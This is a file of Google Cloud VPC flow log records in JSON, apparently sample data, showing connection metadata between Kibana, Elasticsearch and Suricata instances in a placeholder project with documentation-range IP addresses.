-{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"203.0.113.134","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"203.0.113.134","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"203.0.113.134","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.0.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"203.0.113.134","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"203.0.113.134","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"